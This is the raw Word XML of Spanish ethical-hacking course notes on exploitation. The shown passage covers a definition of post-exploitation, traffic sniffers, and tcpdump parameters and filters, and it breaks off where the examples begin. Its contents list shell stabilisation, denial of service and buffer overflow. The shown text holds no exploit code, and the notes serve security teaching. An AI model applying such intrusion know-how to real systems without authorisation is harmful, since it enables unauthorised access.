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w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">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Python para Hacking ético</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">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UD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">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Apuntes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:color w:val="cfda2d"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId7" w:type="default"/>
          <w:footerReference r:id="rId8" w:type="default"/>
          <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
          <w:pgMar w:bottom="426" w:top="567" w:left="1701" w:right="1701" w:header="708" w:footer="708"/>
          <w:pgNumType w:start="1"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:color w:val="cfda2d"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Junio 2022-2023</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76" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AURKIBIDEA</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ycblfaqpc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es la post-explotación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op7i8cbfp1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Análisis del tráfico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tg30k31ou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Tcpdump</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1w76w44l2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Wireshark</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kvgrnuzgzs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Estabilización de la shell</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rb7w5jh0pi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Denegación de Servicio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3w4lvgdwp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Buffer Overflow</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9o9784la5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Prueba de concepto real</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an3oukcpk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Tareas de limpieza</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uct26fnzf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after="0" w:before="170" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="0" w:before="170" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:after="0" w:before="170" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="953734"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="953734"/>
          <w:sz w:val="98"/>
          <w:szCs w:val="98"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¡¡¡ATENCIÓN!!!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId9" w:type="default"/>
          <w:footerReference r:id="rId10" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
          <w:pgMar w:bottom="426" w:top="567" w:left="1701" w:right="1701" w:header="708" w:footer="708"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="953734"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Los métodos utilizados en este documento pueden ser ilegales; por lo tanto, no los podrás poner en práctica fuera de un entorno de laboratorio. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.iycblfaqpcw4" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ué es la </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post-e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xplotación</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">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post-explotación es la fase final del pentesting; en ella, el pentester evalúa y explora los sistemas y redes que ha comprometido para extraer información confidencial y aumentar su acceso y control. En esta fase, el hacker puede ejecutar comandos y scripts para obtener información adicional sobre la configuración y la topología de la red, comprobar la respuesta de los servidores ante acciones que podrían llevar a cabo los atacantes, recopilar información confidencial como contraseñas y datos sensibles,  establecer una conexión persistente para una posterior revisión…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">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esta fase, una vez comprometidas ciertas máquinas, es muy probable que tengamos que volver a tareas de fases previas para reconocer, enumerar y comprometer nuevos equipos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.op7i8cbfp1k1" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis del tráfico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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Los analizadores de tráfico (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sniffers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) son herramientas esenciales para la seguridad informática, ya que proporcionan una visión detallada del tráfico de red. Pueden capturar, analizar y monitorizar el tráfico de red en tiempo real, permitiendo a los administradores de seguridad detectar y responder rápidamente a incidentes de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">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Los analizadores de tráfico se pueden utilizar en diferentes entornos: terminales, redes pequeñas y medianas, grandes redes empresariales… Pueden capturar tráfico de todos los protocolos de red y proporcionar información detallada sobre él: direcciones IP, puertos, protocolos, contenido de los paquetes ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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Además, pueden ser utilizados para detectar patrones anómalos en el tráfico de red, lo que permite a los administradores de seguridad detectar y responder a posibles amenazas. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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Por otra parte, permiten guardar el tráfico en archivos que podrán ser tratados de manera offline y que podrán ser incluídos en informes. Sin embargo, hay que tener en cuenta que podemos llegar a guardar grandes cantidades de información en archivos demasiado pesados, por lo cual conviene dedicar tiempo a guardar sólo lo que nos interesa. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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Es difícil enmarcar el análisis de tráfico en una sola fase del proceso de pentest: puede considerarse que sirve para reconocer y enumerar, pero también para analizar el comportamiento a bajo nivel de la explotación previa de algunas vulnerabilidades ; e incluso podría tratarse de una tarea propia del análisis forense. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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En estos apuntes vamos a analizar principalmente dos analizadores de tráfico: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="120" w:line="276"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Tcpdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: herramienta de línea de comandos instalada en la mayoría de las distribuciones </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GNU/Linux</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26">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="12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Wireshark</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Tiene entorno gráfico y funciona en cualquier tipo de sistema operativo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="792" w:hanging="432"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dtg30k31ou96" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tcpdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tcpdump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">es una herramienta que funciona escuchando en una interfaz de red específica y que puede capturar los paquetes que pasan a través de ella. Esos paquetes se pueden filtrar mediante una variedad de criterios: dirección IP de origen o destino, puerto de origen o destino,  protocolo de red utilizado …. Son mostrados en un formato legible, hallándose en ellos  información como la hora de captura, direcciones IP de origen y destino, puertos, números de secuencia y acuse de recibo, entre otros. También se pueden guardar los paquetes capturados en un archivo para su posterior análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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Los parámetros más comunes con los que se puede lanzar la herramienta son:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="6015.0" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1110"/>
        <w:gridCol w:w="4905"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1110"/>
            <w:gridCol w:w="4905"/>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2A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>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Parámetro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B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:jc w:val="center"/>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Descripción</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-i</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Interfaz de red en la que hacer la captura</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-c</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Número de paquetes a capturar</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-w</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Archivo para guardar la salida de la captura</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-F</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Utilizar un fichero como entrada</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-s</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Tamaño de trama a capturar</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-n</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No resolver direcciones de nombres</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-X</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Mostrar contenido de paquetes en hexadecimal y ASCII</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-v</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Mostrar detalles adicionales de la captura</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-e</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Mostrar información del encabezado del paquete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="255" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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line="240" w:lineRule="auto"/>
              <w:ind w:left="19"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-f</w:t>
            </w:r>
          </w:p>
        </w:tc>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after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>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Aplicar una expresión de filtro de paquetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="808080"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="808080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtrado de paquetes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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Los filtros de "tcpdump" son expresiones lógicas que se utilizan para determinar si un paquete debe ser capturado o descartado; esas expresiones están compuestas por palabras clave conocidas como primitivas, las cuales  Algunas de las primitivas comunes incluyen tipo, dirección, y protocolo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">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Algunas de las primitivas de tipo pueden ser: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="12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host</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: un host determinado.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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net</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: una red completa. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: un puerto determinado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="12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portrange</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: un rango de puertos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="12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Las directivas de dirección, por su parte, son: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="12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src</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: source, IP de origen, tráfico entrante. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="12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dst</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: destination, IP de destino, tráfico saliente. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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Cabe indicar que los paquetes pueden ser filtrados según el protocolo simplemente incluyendo el nombre del protocolo en el comando a ejecutar. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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Las primitivas pueden combinarse utilizando operadores lógicos como "and" y "or", negarse con "not" y agruparse con paréntesis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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Vamos a ver algunos ejemplos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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cuyo protocolo sea ICMP:</w:t>
      </w:r>
